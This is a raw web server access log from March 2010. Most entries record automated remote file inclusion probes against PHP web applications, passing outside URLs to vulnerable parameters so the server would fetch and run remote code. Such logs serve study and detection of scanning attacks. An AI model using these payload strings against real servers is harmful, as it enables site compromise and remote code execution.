99.57.90.154 - - [08/Mar/2010:13:57:38 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
99.57.90.154 - - [08/Mar/2010:13:57:43 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:14:00:28 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:14:00:29 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:14:00:32 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:02:12 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:02:13 -0800] "GET /write_comment_update.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:02:13 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:14:02:41 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:14:02:42 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:14:02:45 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:07:49 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:07:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:07:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.180.124.146 - - [08/Mar/2010:14:07:55 -0800] "GET /download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.180.124.146 - - [08/Mar/2010:14:08:01 -0800] "GET /logs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.180.124.146 - - [08/Mar/2010:14:08:01 -0800] "GET /logs/access.log%20%20//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
99.57.90.154 - - [08/Mar/2010:14:09:17 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
99.57.90.154 - - [08/Mar/2010:14:09:19 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
99.57.90.154 - - [08/Mar/2010:14:09:19 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:10:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:10:05 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:10:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:14:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:14:37 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:14:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:20:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:20:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:20:55 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:21:13 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:21:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:21:13 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.206 - - [08/Mar/2010:14:24:35 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:14:26:25 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:34:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:34:07 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:14:34:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.195 - - [08/Mar/2010:14:39:27 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:12 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:12 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:12 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:12 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:12 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:12 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:13 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:13 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:13 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:17 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:17 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:14:49:17 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:52:41 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:52:41 -0800] "GET /delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:52:41 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.55.227.132 - - [08/Mar/2010:14:52:49 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.55.227.132 - - [08/Mar/2010:14:52:49 -0800] "GET /delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.55.227.132 - - [08/Mar/2010:14:52:49 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:53:06 -0800] "GET /delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:53:06 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.100.181.218 - - [08/Mar/2010:14:53:06 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.55.227.132 - - [08/Mar/2010:14:53:20 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.55.227.132 - - [08/Mar/2010:14:53:20 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.55.227.132 - - [08/Mar/2010:14:53:20 -0800] "GET /delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.180.124.146 - - [08/Mar/2010:14:57:42 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.180.124.146 - - [08/Mar/2010:14:57:42 -0800] "GET /delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.180.124.146 - - [08/Mar/2010:14:57:42 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:08:56 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:08:56 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:08:56 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:09:01 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:09:01 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:09:01 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.180.124.146 - - [08/Mar/2010:15:10:56 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.180.124.146 - - [08/Mar/2010:15:10:56 -0800] "GET /delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.180.124.146 - - [08/Mar/2010:15:10:56 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:11:07 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:11:07 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.217.216.132 - - [08/Mar/2010:15:11:07 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [08/Mar/2010:15:11:18 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:15:18:41 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
209.126.254.139 - - [08/Mar/2010:15:25:49 -0800] "GET /logs/access_100104.log///?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:15:25:49 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:15:25:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:15:28:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:15:28:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:15:28:21 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:15:29:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:15:29:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:15:29:07 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
194.39.140.100 - - [08/Mar/2010:15:30:54 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:15:30:54 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:15:30:54 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:15:35:18 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:35:44 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:35:45 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:35:47 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:40:05 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:40:07 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:40:07 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:09 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:09 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:15 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:17 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:17 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:18 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:20 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:27 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:15:41:27 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
124.49.100.254 - - [08/Mar/2010:15:49:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [08/Mar/2010:15:49:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
124.49.100.254 - - [08/Mar/2010:15:49:39 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
